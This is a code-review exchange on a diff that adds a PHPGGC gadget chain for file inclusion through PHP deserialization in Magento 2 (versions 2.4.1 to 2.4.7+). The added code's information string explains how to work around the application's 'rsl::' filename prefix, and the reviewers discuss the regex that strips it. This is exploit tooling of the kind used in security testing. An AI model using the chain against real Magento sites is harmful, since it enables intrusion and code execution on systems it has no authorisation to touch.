gadgetchains/Magento2/FI/2/chain.php

```diff
@@ -0,0 +1,41 @@
+<?php
+
+namespace GadgetChain\Magento2;
+
+class FI2 extends \PHPGGC\GadgetChain\FileInclude
+{
+    public static $version = '2.4.1 <= 2.4.7+';
+    public static $vector = '__destruct';
+    public static $author = 'mcdruid';
+    public static $information = 'Your included file must end in .php
+    Magento2 will add a prefix of "rsl::" to the filename. So if you specify
+    /path/to/evil.php the target file should be at /path/to/rsl::evil.php
+    A path relative to the docroot (typically "pub") should also work.
+    The path is checked with file_exists() so basic path traversal does not
+    overcome the prefixing of the filename.';
+
+    public function process_parameters(array $parameters)
+    {
+        $parameters = parent::process_parameters($parameters);
+        // Remove the prefix and suffix if they have been specified, as they
+        // will be added by the application.
+        $parameters['remote_path'] = preg_replace('#(^rsl::|.php$)#', '', $parameters['remote_path']);
```

Comment:
```suggestion
        $parameters['remote_path'] = preg_replace('#(^rsl::|.php$)#i', '', $parameters['remote_path']);
```

Are you sure this will remove both the prefix and the suffix if both are present?

Reply:
I can see why you'd ask as it seems like an OR in the pattern so perhaps only one replacement would take place.. however:

```
php > $filename = 'rsl::foobar.php';
php > $filename = preg_replace('#(^rsl::|.php$)#', '', $filename);
php > print $filename;
foobar
```

I did have to check to be certain though!

Good suggestion to make the patterns case-insensitive.. but I'm not positive the include would work if the prefix was supplied in the payload in uppercase. Will add the `i` flag anyway.